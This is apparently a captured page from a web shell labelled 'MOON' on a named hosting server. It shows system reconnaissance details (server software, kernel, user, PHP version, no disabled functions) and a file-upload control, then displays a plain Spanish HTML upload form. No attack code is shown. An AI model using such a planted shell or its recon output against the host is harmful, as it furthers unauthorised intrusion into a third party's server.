MOON
Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 FrontPage/5.0.2.2635
System: Linux server.asjudinet.com 2.6.32-042stab141.3 #1 SMP Fri Nov 15 22:45:34 MSK 2019 i686
User: asjudine (504)
PHP: 5.2.17
Disabled: NONE
Upload Files
File: /home/asjudine/www/escoger_archivos.htm
<html>
<head>
<title>Documento sin t&iacute;tulo</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.Estilo1 {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
}
-->
</style>
</head>
<body>
<form enctype="multipart/form-data" action="guardar_archivos.php" method="post">
  <table width="518" border="0" align="center" cellpadding="3" cellspacing="3">
    <tr bgcolor="#0099FF">
      <th colspan="2" scope="row">FORMULARIO PARA SUBIR EL ARCHIVO A ENVIAR </th>
    </tr>
    <tr bgcolor="#FFFFCC">
      <th colspan="2" scope="row"><div align="right"></div></th>
    </tr>
    <tr bgcolor="#FFFFCC">
      <th scope="row"><div align="right"><span class="Estilo1">UBICACION DEL ARCHIVO : </span></div></th>
      <td><input name="identificacion" type="text" id="identificacion" size="15" maxlength="15"></td>
    </tr>
    <tr bgcolor="#FFFFCC">
      <th width="248" scope="row"><div align="right"><span class="Estilo1">UBICACION DEL ARCHIVO  : </span></div></th>
      <td width="249"><input type="file" name="archivito"></td>
    </tr>
    <tr bgcolor="#FFFFCC">
      <th colspan="2" scope="row"><input name="submit" type="submit" value="Enviar archivo"></th>
    </tr>
  </table>
</form>
</body>
</html>